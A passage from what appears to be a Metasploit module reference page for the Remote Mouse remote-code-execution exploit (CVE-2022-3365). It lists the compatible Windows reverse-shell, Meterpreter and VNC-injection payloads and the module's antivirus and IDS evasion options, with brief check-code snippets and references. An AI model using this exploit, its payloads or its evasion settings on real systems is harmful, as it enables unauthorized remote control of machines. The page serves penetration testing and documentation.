153 payload/windows/powershell_reverse_tcp_ssl normal No Windows Interactive Powershell Session, Reverse TCP SSL
154 payload/windows/shell/bind_hidden_ipknock_tcp normal No Windows Command Shell, Hidden Bind Ipknock TCP Stager
155 payload/windows/shell/bind_hidden_tcp normal No Windows Command Shell, Hidden Bind TCP Stager
156 payload/windows/shell/bind_ipv6_tcp normal No Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)
157 payload/windows/shell/bind_ipv6_tcp_uuid normal No Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)
158 payload/windows/shell/bind_named_pipe normal No Windows Command Shell, Windows x86 Bind Named Pipe Stager
159 payload/windows/shell/bind_nonx_tcp normal No Windows Command Shell, Bind TCP Stager (No NX or Win7)
160 payload/windows/shell/bind_tcp normal No Windows Command Shell, Bind TCP Stager (Windows x86)
161 payload/windows/shell/bind_tcp_rc4 normal No Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
162 payload/windows/shell/bind_tcp_uuid normal No Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)
163 payload/windows/shell/reverse_ipv6_tcp normal No Windows Command Shell, Reverse TCP Stager (IPv6)
164 payload/windows/shell/reverse_nonx_tcp normal No Windows Command Shell, Reverse TCP Stager (No NX or Win7)
165 payload/windows/shell/reverse_ord_tcp normal No Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
166 payload/windows/shell/reverse_tcp normal No Windows Command Shell, Reverse TCP Stager
167 payload/windows/shell/reverse_tcp_allports normal No Windows Command Shell, Reverse All-Port TCP Stager
168 payload/windows/shell/reverse_tcp_dns normal No Windows Command Shell, Reverse TCP Stager (DNS)
169 payload/windows/shell/reverse_tcp_rc4 normal No Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
170 payload/windows/shell/reverse_tcp_rc4_dns normal No Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
171 payload/windows/shell/reverse_tcp_uuid normal No Windows Command Shell, Reverse TCP Stager with UUID Support
172 payload/windows/shell/reverse_udp normal No Windows Command Shell, Reverse UDP Stager with UUID Support
173 payload/windows/shell_bind_tcp normal No Windows Command Shell, Bind TCP Inline
174 payload/windows/shell_bind_tcp_xpfw normal No Windows Disable Windows ICF, Command Shell, Bind TCP Inline
175 payload/windows/shell_hidden_bind_tcp normal No Windows Command Shell, Hidden Bind TCP Inline
176 payload/windows/shell_reverse_tcp normal No Windows Command Shell, Reverse TCP Inline
177 payload/windows/speak_pwned normal No Windows Speech API - Say "You Got Pwned!"
178 payload/windows/upexec/bind_hidden_ipknock_tcp normal No Windows Upload/Execute, Hidden Bind Ipknock TCP Stager
179 payload/windows/upexec/bind_hidden_tcp normal No Windows Upload/Execute, Hidden Bind TCP Stager
180 payload/windows/upexec/bind_ipv6_tcp normal No Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)
181 payload/windows/upexec/bind_ipv6_tcp_uuid normal No Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)
182 payload/windows/upexec/bind_named_pipe normal No Windows Upload/Execute, Windows x86 Bind Named Pipe Stager
183 payload/windows/upexec/bind_nonx_tcp normal No Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
184 payload/windows/upexec/bind_tcp normal No Windows Upload/Execute, Bind TCP Stager (Windows x86)
185 payload/windows/upexec/bind_tcp_rc4 normal No Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm)
186 payload/windows/upexec/bind_tcp_uuid normal No Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86)
187 payload/windows/upexec/reverse_ipv6_tcp normal No Windows Upload/Execute, Reverse TCP Stager (IPv6)
188 payload/windows/upexec/reverse_nonx_tcp normal No Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
189 payload/windows/upexec/reverse_ord_tcp normal No Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
190 payload/windows/upexec/reverse_tcp normal No Windows Upload/Execute, Reverse TCP Stager
191 payload/windows/upexec/reverse_tcp_allports normal No Windows Upload/Execute, Reverse All-Port TCP Stager
192 payload/windows/upexec/reverse_tcp_dns normal No Windows Upload/Execute, Reverse TCP Stager (DNS)
193 payload/windows/upexec/reverse_tcp_rc4 normal No Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
194 payload/windows/upexec/reverse_tcp_rc4_dns normal No Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
195 payload/windows/upexec/reverse_tcp_uuid normal No Windows Upload/Execute, Reverse TCP Stager with UUID Support
196 payload/windows/upexec/reverse_udp normal No Windows Upload/Execute, Reverse UDP Stager with UUID Support
197 payload/windows/vncinject/bind_hidden_ipknock_tcp normal No VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager
198 payload/windows/vncinject/bind_hidden_tcp normal No VNC Server (Reflective Injection), Hidden Bind TCP Stager
199 payload/windows/vncinject/bind_ipv6_tcp normal No VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
200 payload/windows/vncinject/bind_ipv6_tcp_uuid normal No VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
201 payload/windows/vncinject/bind_named_pipe normal No VNC Server (Reflective Injection), Windows x86 Bind Named Pipe Stager
202 payload/windows/vncinject/bind_nonx_tcp normal No VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
203 payload/windows/vncinject/bind_tcp normal No VNC Server (Reflective Injection), Bind TCP Stager (Windows x86)
204 payload/windows/vncinject/bind_tcp_rc4 normal No VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
205 payload/windows/vncinject/bind_tcp_uuid normal No VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
206 payload/windows/vncinject/reverse_hop_http normal No VNC Server (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
207 payload/windows/vncinject/reverse_http normal No VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet)
208 payload/windows/vncinject/reverse_http_proxy_pstore normal No VNC Server (Reflective Injection), Reverse HTTP Stager Proxy
209 payload/windows/vncinject/reverse_ipv6_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
210 payload/windows/vncinject/reverse_nonx_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
211 payload/windows/vncinject/reverse_ord_tcp normal No VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
212 payload/windows/vncinject/reverse_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager
213 payload/windows/vncinject/reverse_tcp_allports normal No VNC Server (Reflective Injection), Reverse All-Port TCP Stager
214 payload/windows/vncinject/reverse_tcp_dns normal No VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
215 payload/windows/vncinject/reverse_tcp_rc4 normal No VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
216 payload/windows/vncinject/reverse_tcp_rc4_dns normal No VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
217 payload/windows/vncinject/reverse_tcp_uuid normal No VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support
218 payload/windows/vncinject/reverse_winhttp normal No VNC Server (Reflective Injection), Windows Reverse HTTP Stager (winhttp)
219 payload/windows/x64/custom/bind_ipv6_tcp normal No Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager
220 payload/windows/x64/custom/bind_ipv6_tcp_uuid normal No Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support
221 payload/windows/x64/custom/bind_named_pipe normal No Windows shellcode stage, Windows x64 Bind Named Pipe Stager
222 payload/windows/x64/custom/bind_tcp normal No Windows shellcode stage, Windows x64 Bind TCP Stager
223 payload/windows/x64/custom/bind_tcp_rc4 normal No Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)
224 payload/windows/x64/custom/bind_tcp_uuid normal No Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64)
225 payload/windows/x64/custom/reverse_http normal No Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)
226 payload/windows/x64/custom/reverse_https normal No Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)
227 payload/windows/x64/custom/reverse_named_pipe normal No Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager
228 payload/windows/x64/custom/reverse_tcp normal No Windows shellcode stage, Windows x64 Reverse TCP Stager
229 payload/windows/x64/custom/reverse_tcp_rc4 normal No Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
230 payload/windows/x64/custom/reverse_tcp_uuid normal No Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)
231 payload/windows/x64/custom/reverse_winhttp normal No Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp)
232 payload/windows/x64/custom/reverse_winhttps normal No Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)
233 payload/windows/x64/exec normal No Windows x64 Execute Command
234 payload/windows/x64/loadlibrary normal No Windows x64 LoadLibrary Path
235 payload/windows/x64/messagebox normal No Windows MessageBox x64
236 payload/windows/x64/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
237 payload/windows/x64/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
238 payload/windows/x64/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager
239 payload/windows/x64/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
240 payload/windows/x64/meterpreter/bind_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)
241 payload/windows/x64/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
242 payload/windows/x64/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
243 payload/windows/x64/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
244 payload/windows/x64/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
245 payload/windows/x64/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
246 payload/windows/x64/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
247 payload/windows/x64/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
248 payload/windows/x64/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
249 payload/windows/x64/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
250 payload/windows/x64/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline (x64)
251 payload/windows/x64/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline (x64)
252 payload/windows/x64/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline (x64)
253 payload/windows/x64/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline (x64)
254 payload/windows/x64/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)
255 payload/windows/x64/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline x64
256 payload/windows/x64/peinject/bind_ipv6_tcp normal No Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager
257 payload/windows/x64/peinject/bind_ipv6_tcp_uuid normal No Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager with UUID Support
258 payload/windows/x64/peinject/bind_named_pipe normal No Windows Inject Reflective PE Files, Windows x64 Bind Named Pipe Stager
259 payload/windows/x64/peinject/bind_tcp normal No Windows Inject Reflective PE Files, Windows x64 Bind TCP Stager
260 payload/windows/x64/peinject/bind_tcp_rc4 normal No Windows Inject Reflective PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)
261 payload/windows/x64/peinject/bind_tcp_uuid normal No Windows Inject Reflective PE Files, Bind TCP Stager with UUID Support (Windows x64)
262 payload/windows/x64/peinject/reverse_named_pipe normal No Windows Inject Reflective PE Files, Windows x64 Reverse Named Pipe (SMB) Stager
263 payload/windows/x64/peinject/reverse_tcp normal No Windows Inject Reflective PE Files, Windows x64 Reverse TCP Stager
264 payload/windows/x64/peinject/reverse_tcp_rc4 normal No Windows Inject Reflective PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
265 payload/windows/x64/peinject/reverse_tcp_uuid normal No Windows Inject Reflective PE Files, Reverse TCP Stager with UUID Support (Windows x64)
266 payload/windows/x64/pingback_reverse_tcp normal No Windows x64 Pingback, Reverse TCP Inline
267 payload/windows/x64/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP
268 payload/windows/x64/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP
269 payload/windows/x64/powershell_reverse_tcp_ssl normal No Windows Interactive Powershell Session, Reverse TCP SSL
270 payload/windows/x64/shell/bind_ipv6_tcp normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
271 payload/windows/x64/shell/bind_ipv6_tcp_uuid normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
272 payload/windows/x64/shell/bind_named_pipe normal No Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager
273 payload/windows/x64/shell/bind_tcp normal No Windows x64 Command Shell, Windows x64 Bind TCP Stager
274 payload/windows/x64/shell/bind_tcp_rc4 normal No Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
275 payload/windows/x64/shell/bind_tcp_uuid normal No Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
276 payload/windows/x64/shell/reverse_tcp normal No Windows x64 Command Shell, Windows x64 Reverse TCP Stager
277 payload/windows/x64/shell/reverse_tcp_rc4 normal No Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
278 payload/windows/x64/shell/reverse_tcp_uuid normal No Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
279 payload/windows/x64/shell_bind_tcp normal No Windows x64 Command Shell, Bind TCP Inline
280 payload/windows/x64/shell_reverse_tcp normal No Windows x64 Command Shell, Reverse TCP Inline
281 payload/windows/x64/vncinject/bind_ipv6_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager
282 payload/windows/x64/vncinject/bind_ipv6_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support
283 payload/windows/x64/vncinject/bind_named_pipe normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager
284 payload/windows/x64/vncinject/bind_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
285 payload/windows/x64/vncinject/bind_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
286 payload/windows/x64/vncinject/bind_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)
287 payload/windows/x64/vncinject/reverse_http normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
288 payload/windows/x64/vncinject/reverse_https normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
289 payload/windows/x64/vncinject/reverse_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
290 payload/windows/x64/vncinject/reverse_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
291 payload/windows/x64/vncinject/reverse_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
292 payload/windows/x64/vncinject/reverse_winhttp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
293 payload/windows/x64/vncinject/reverse_winhttps normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)
Evasion Options
Here is the full list of possible evasion options supported by the windows/misc/remote_mouse_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(windows/misc/remote_mouse_rce) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTML::base64 none no Enable HTML obfuscation via an embeded base64 html object (IE not supported) (Accepted: n
one, plain, single_pad, double_pad, random_space_injection)
HTML::javascript::escape 0 no Enable HTML obfuscation via HTML escaping (number of iterations)
HTML::unicode none no Enable HTTP obfuscation via unicode (Accepted: none, utf-16le, utf-16be, utf-16be-marker,
utf-32le, utf-32be)
HTTP::chunked false no Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
HTTP::compression none no Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::junk_headers false no Enable insertion of random junk HTTP headers
HTTP::no_cache false no Disallow the browser to cache HTTP content
HTTP::server_name Apache yes Configures the Server header of all outgoing replies
TCP::max_send_size 0 no Maximum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Received handshake with version: <SPLITS.LAST>
Here is a relevant code snippet related to the "Received handshake with version: <SPLITS.LAST>" error message:
108: connect
109: response = sock.get_once
110: disconnect
111: if response.include?('SIN 15win nop nop')
112: splits = response.split(' ')
113: return CheckCode::Appears("Received handshake with version: #{splits.last}")
114: end
115:
116: CheckCode::Unknown('Invalid response from target')
117: end
118:
Invalid response from target
Here is a relevant code snippet related to the "Invalid response from target" error message:
111: if response.include?('SIN 15win nop nop')
112: splits = response.split(' ')
113: return CheckCode::Appears("Received handshake with version: #{splits.last}")
114: end
115:
116: CheckCode::Unknown('Invalid response from target')
117: end
118:
119: def send_command(command)
120: if command == windows_key
121: sock.put(command)
Go back to menu.
Related Pull Requests
- #16982 Merged Pull Request: Update Dell iDRAC login scanner to work with v8 and v9
- #17032 Merged Pull Request: Add module for pfSense pfBlockNG unauth RCE as root - CVE-2022-31814
- #17116 Merged Pull Request: Adding CVE-2022-22947 Spring Cloud Gateway RCE Exploit
- #17092 Merged Pull Request: netlm_downgrade: Cleanup and support non-Meterpreter sessions
- #16987 Merged Pull Request: guard for all possible RubySMBError conditions
- #17123 Merged Pull Request: netrc and fetchmailrc docs
- #17057 Merged Pull Request: Msf::Post::Windows::ExtAPI: Remove load_extapi method
References
- EDB-46697
- CVE-2022-3365
- https://www.remotemouse.net/
- https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/remote%20mouse/remote-mouse-rce.py
See Also
Check also the following modules related to this module:
- exploit/windows/misc/remote_control_collection_rce
- exploit/windows/backupexec/remote_agent
- exploit/linux/http/dlink_dcs_930l_authenticated_remote_command_execution
- exploit/multi/misc/claymore_dual_miner_remote_manager_rce
- exploit/multi/misc/msfd_rce_remote
- exploit/unix/webapp/pajax_remote_exec
- exploit/windows/browser/honeywell_hscremotedeploy_exec
- exploit/windows/fileformat/safenet_softremote_groupname
- exploit/windows/misc/unified_remote_rce
- post/windows/gather/credentials/mremote
- exploit/windows/misc/mobile_mouse_rce
- exploit/windows/misc/wifi_mouse_rce
- exploit/windows/misc/ais_esel_server_rce
- exploit/windows/misc/hp_imc_dbman_restartdb_unauth_rce
- exploit/windows/misc/hp_imc_dbman_restoredbase_unauth_rce
- exploit/windows/misc/manageengine_eventlog_analyzer_rce
- exploit/windows/browser/ie_setmousecapture_uaf
Authors
- h00die
- 0RPHON
- H4rk3nz0
Version
This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.
